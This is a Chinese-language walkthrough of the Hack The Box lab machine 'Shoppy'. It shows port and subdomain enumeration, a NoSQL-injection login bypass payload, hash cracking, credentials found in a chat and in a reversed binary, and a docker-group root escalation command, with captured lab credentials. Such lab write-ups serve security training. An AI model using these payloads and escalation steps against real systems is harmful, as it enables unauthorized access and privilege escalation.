一、思路概要
1.
信息收集目录枚举得到/login页面;
2.
万能密码登录/login页面;
3.
再次万能密码拿到josh账户(非ssh账户);
4.
枚举子域得到mattermost子域;
5.
josh账户登录mattermost子域并分析页面拿到ssh账户;
6.
连上ssh账户sudo -l发现可执行文件;
7.
逆向分析可执行文件拿到deploy账户;
8.
docker提权获取root权限。
二、信息收集
nmap(用如下两步,先扫全端口,再指定端口定向扫描服务、版本相关信息,有助于提升扫描速度)
┌──(root💀kali)-[~/Desktop]└─# nmap -p- --min-rate 10000 10.129.92.247Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:15 EDTNmap scan report for 10.129.92.247Host is up (0.33s latency).Not shown: 65532 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http9093/tcp open copycatNmap done: 1 IP address (1 host up) scanned in 9.05 seconds
┌──(root💀kali)-[~/Desktop]└─# nmap -p 22,80,9093 -sCV 10.129.92.247Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-31 04:24 EDTNmap scan report for 10.129.92.247Host is up (0.32s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)| ssh-hostkey:| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)80/tcp open http nginx 1.23.1|_http-server-header: nginx/1.23.1|_http-title: Did not follow redirect to http://shoppy.htb9093/tcp open copycat?| fingerprint-strings:| GenericLines:| HTTP/1.1 400 Bad Request| Content-Type: text/plain; charset=utf-8| Connection: close| Request| GetRequest:| HTTP/1.0 200 OK| Content-Type: text/plain; version=0.0.4; charset=utf-8| Date: Fri, 31 Mar 2023 08:24:50 GMT| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.| TYPE go_gc_cycles_automatic_gc_cycles_total counter| go_gc_cycles_automatic_gc_cycles_total 15| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.| TYPE go_gc_cycles_forced_gc_cycles_total counter| go_gc_cycles_forced_gc_cycles_total 0| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.| TYPE go_gc_cycles_total_gc_cycles_total counter| go_gc_cycles_total_gc_cycles_total 15| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.| TYPE go_gc_duration_seconds summary| go_gc_duration_seconds{quantile="0"} 2.8824e-05| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05| go_gc_d| HTTPOptions:| HTTP/1.0 200 OK| Content-Type: text/plain; version=0.0.4; charset=utf-8| Date: Fri, 31 Mar 2023 08:24:51 GMT| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.| TYPE go_gc_cycles_automatic_gc_cycles_total counter| go_gc_cycles_automatic_gc_cycles_total 15| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.| TYPE go_gc_cycles_forced_gc_cycles_total counter| go_gc_cycles_forced_gc_cycles_total 0| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.| TYPE go_gc_cycles_total_gc_cycles_total counter| go_gc_cycles_total_gc_cycles_total 15| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.| TYPE go_gc_duration_seconds summary| go_gc_duration_seconds{quantile="0"} 2.8824e-05| go_gc_duration_seconds{quantile="0.25"} 7.6212e-05|_ go_gc_d1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port9093-TCP:V=7.91%I=7%D=3/31%Time=642698D4%P=x86_64-pc-linux-gnu%r(GeSF:nericLines,67,"HTTP/1.1x20400x20Badx20RequestrnContent-Type:x20tSF:ext/plain;x20charset=utf-8rnConnection:x20closernrn400x20BadxSF:20Request")%r(GetRequest,152D,"HTTP/1.0x20200x20OKrnContent-Type:SF:x20text/plain;x20version=0.0.4;x20charset=utf-8rnDate:x20Fri,x2SF:031x20Marx202023x2008:24:50x20GMTrnrn#x20HELPx20go_gc_cycles_SF:automatic_gc_cycles_totalx20Countx20ofx20completedx20GCx20cyclesxSF:20generatedx20byx20thex20Gox20runtime.n#x20TYPEx20go_gc_cycles_SF:automatic_gc_cycles_totalx20counterngo_gc_cycles_automatic_gc_cycles_SF:totalx2015n#x20HELPx20go_gc_cycles_forced_gc_cycles_totalx20CountSF:x20ofx20completedx20GCx20cyclesx20forcedx20byx20thex20applicatioSF:n.n#x20TYPEx20go_gc_cycles_forced_gc_cycles_totalx20counterngo_gcSF:_cycles_forced_gc_cycles_totalx200n#x20HELPx20go_gc_cycles_total_gcSF:_cycles_totalx20Countx20ofx20allx20completedx20GCx20cycles.n#xSF:20TYPEx20go_gc_cycles_total_gc_cycles_totalx20counterngo_gc_cycles_tSF:otal_gc_cycles_totalx2015n#x20HELPx20go_gc_duration_secondsx20Ax2SF:0summaryx20ofx20thex20pausex20durationx20ofx20garbagex20collectiSF:onx20cycles.n#x20TYPEx20go_gc_duration_secondsx20summaryngo_gc_dSF:uration_seconds{quantile="0"}x202.8824e-05ngo_gc_duration_seconds{SF:quantile="0.25"}x207.6212e-05ngo_gc_d")%r(HTTPOptions,1A5A,"HTTP/SF:1.0x20200x20OKrnContent-Type:x20text/plain;x20version=0.0.4;xSF:20charset=utf-8rnDate:x20Fri,x2031x20Marx202023x2008:24:51x20GMSF:Trnrn#x20HELPx20go_gc_cycles_automatic_gc_cycles_totalx20CountxSF:20ofx20completedx20GCx20cyclesx20generatedx20byx20thex20Gox20ruSF:ntime.n#x20TYPEx20go_gc_cycles_automatic_gc_cycles_totalx20counterSF:ngo_gc_cycles_automatic_gc_cycles_totalx2015n#x20HELPx20go_gc_cyclSF:es_forced_gc_cycles_totalx20Countx20ofx20completedx20GCx20cyclesxSF:20forcedx20byx20thex20application.n#x20TYPEx20go_gc_cycles_forceSF:d_gc_cycles_totalx20counterngo_gc_cycles_forced_gc_cycles_totalx200SF:n#x20HELPx20go_gc_cycles_total_gc_cycles_totalx20Countx20ofx20allSF:x20completedx20GCx20cycles.n#x20TYPEx20go_gc_cycles_total_gc_cyclSF:es_totalx20counterngo_gc_cycles_total_gc_cycles_totalx2015n#x20HELSF:Px20go_gc_duration_secondsx20Ax20summaryx20ofx20thex20pausex20duSF:rationx20ofx20garbagex20collectionx20cycles.n#x20TYPEx20go_gc_dSF:uration_secondsx20summaryngo_gc_duration_seconds{quantile="0"}x202SF:.8824e-05ngo_gc_duration_seconds{quantile="0.25"}x207.6212e-05nSF:go_gc_d");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 122.77 seconds
开放端口:22(ssh)、80(http)、9093(copycat),获得域名shoppy.htb
将域名添加进本地hosts文件
echo "10.129.92.247 shoppy.htb" >> /etc/hosts浏览器打开shoppy.htb
枚举子目录
┌──(root💀kali)-[~/Desktop]└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 100 -mc 200,302,301 -u http://shoppy.htb/FUZZ/'___ /'___ /'___/ __/ / __/ __ __ / __/,__\ ,__/ / ,___/ _/ _ _/_ _ ____/ _/_/ /_/ /___/ /_/v2.0.0-dev________________________________________________:: Method : GET:: URL : http://shoppy.htb/FUZZ:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 100:: Matcher : Response status: 200,302,301________________________________________________[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 413ms]* FUZZ: admin[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 414ms]* FUZZ: images[Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 417ms]* FUZZ: js[Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 435ms]* FUZZ: assets[Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 441ms]* FUZZ: css[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 468ms]* FUZZ: login[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 323ms]* FUZZ: Admin[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 429ms]* FUZZ: Login[Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 335ms]* FUZZ: fonts[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 327ms]* FUZZ: ADMIN[Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 332ms]* FUZZ: exports[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 376ms]* FUZZ:[Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 330ms]* FUZZ: LOGIN:: Progress: [20116/20116] :: Job [1/1] :: 282 req/sec :: Duration: [0:01:06] :: Errors: 0 ::
枚举到的目录,301的页面都没东西,302的都重定向到/login目录
三、万能密码
访问shoppy.htb/login
用户名输入如下,密码任意(万能密码),成功登录
admin'||'1==1
点击页面右上角搜索标签,再次输入万能密码,弹出如下Download export标签
点击Download export标签,得到两组账户,admin和josh
[{"_id": "62db0e93d6d6a999a66ee67a","username": "admin","password": "23c6877d9e2b564ef8b32c3a23de27b2"},{"_id": "62db0e93d6d6a999a66ee67b","username": "josh","password": "6ebcea65320589ca4f2f1ce039975995"}]
破解hash:https://crackstation.net/
joshremembermethisway
用该账户登录ssh,不对
遂用wfuzz枚举子域名,发现很多301
┌──(root💀kali)-[~/Desktop]└─# wfuzz -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt********************************************************* Wfuzz 3.1.0 - The Web Fuzzer *********************************************************Target: http://10.129.92.247/Total requests: 4989=====================================================================ID Response Lines Word Chars Payload=====================================================================000000001: 301 7 L 11 W 169 Ch "www"000000020: 301 7 L 11 W 169 Ch "www2"000000019: 301 7 L 11 W 169 Ch "dev"000000015: 301 7 L 11 W 169 Ch "ns"000000003: 301 7 L 11 W 169 Ch "ftp"000000021: 301 7 L 11 W 169 Ch "ns3"000000022: 301 7 L 11 W 169 Ch "pop3"000000018: 301 7 L 11 W 169 Ch "blog"......
再用ffuf提速枚举子域名(wfuzz这个速度有点窒息,用ffuf或gobuster提速),并且换个大字典,过滤301响应
┌──(root💀kali)-[~/Desktop]└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.92.247 -H "Host: FUZZ.shoppy.htb" -fc 301/'___ /'___ /'___/ __/ / __/ __ __ / __/,__\ ,__/ / ,___/ _/ _ _/_ _ ____/ _/_/ /_/ /___/ /_/v2.0.0-dev________________________________________________:: Method : GET:: URL : http://10.129.92.247:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:: Header : Host: FUZZ.shoppy.htb:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200,204,301,302,307,401,403,405,500:: Filter : Response status: 301________________________________________________[Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 318ms]* FUZZ: mattermost:: Progress: [100000/100000] :: Job [1/1] :: 100 req/sec :: Duration: [0:13:49] :: Errors: 0 ::
发现mattermost子域名,添加进本地hosts文件
echo "10.129.92.247 mattermost.shoppy.htb" >> /etc/hosts访问mattermost.shoppy.htb
用刚刚的josh账户登录,在左侧Deploy Machine栏,聊天记录里发现jaeger账户
username: jaegerpassword: Sh0ppyBest@pp!
ssh连上(IP有变化是因为重启了靶机环境)
┌──(root💀kali)-[~/Desktop]└─# ssh [email protected][email protected]'s password:Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.jaeger@shoppy:~$ iduid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)jaeger@shoppy:~$ pwd/home/jaeger
用sudo -l查看此用户权限
jaeger@shoppy:~$ sudo -l[sudo] password for jaeger:Matching Defaults entries for jaeger on shoppy:env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser jaeger may run the following commands on shoppy:(deploy) /home/deploy/password-manager
发现可执行命令/home/deploy/password-manager,用如下步骤下载到本地
在ssh窗口开启http服务
jaeger@shoppy:/home/deploy$ python3 -m http.server 9898Serving HTTP on 0.0.0.0 port 9898 (http://0.0.0.0:9898/) ...
然后在本地用如下命令下载
wget http://10.129.93.16:9898/password-manager本地用file命令查看文件信息
┌──(root💀kali)-[~/Desktop]└─# file password-managerpassword-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped
是64位ELF(Executable and Linkable Format)文件
四、逆向分析
用radare2工具逆向静态分析一下
参考:https://blog.csdn.net/qq_28429161/article/details/107810534
r2 password-manager输入如下指令,定位main函数地址
> aaa #自动分析并命名函数> afl #查看程序内的函数
找到main函数,然后定位到main函数的地址并查看汇编代码
> s main //定位到main函数入口> pdf //查看当前函数的汇编代码
如上图,int main()和域运算符::表明这是C++程序,运行会先打印Welcome to Josh password manager!
然后打印Please enter your master password: ,并接收键盘输入,如下图
然后将键盘输入与Sample逐一字符对比
对比相同后,会打印Access granted! Here is creds !,然后调用system()函数执行cat命令,查看/home/deploy/creds.txt内容
回到靶机ssh窗口,运行如下命令,提示Please enter your master password:时,输入Sample
jaeger@shoppy:/home/deploy$ sudo -u deploy ./password-manager[sudo] password for jaeger:Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !Deploy Creds :username: deploypassword: Deploying@pp!
可看到已得到账户deploy的用户名密码,执行su deploy切换到deploy账户
看到deploy用户属于docker组,在如下网站搜索docker
https://gtfobins.github.io/五、docker提权
看到如下提权命令
为了让获得的shell环境更稳定,把后面的sh换成bash,执行
deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt bash成功获取root权限
Over!
参考
https://blog.csdn.net/qq_45894840/article/details/127527914
https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html
原文始发于微信公众号(靶机狂魔):靶机—— Shoppy
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论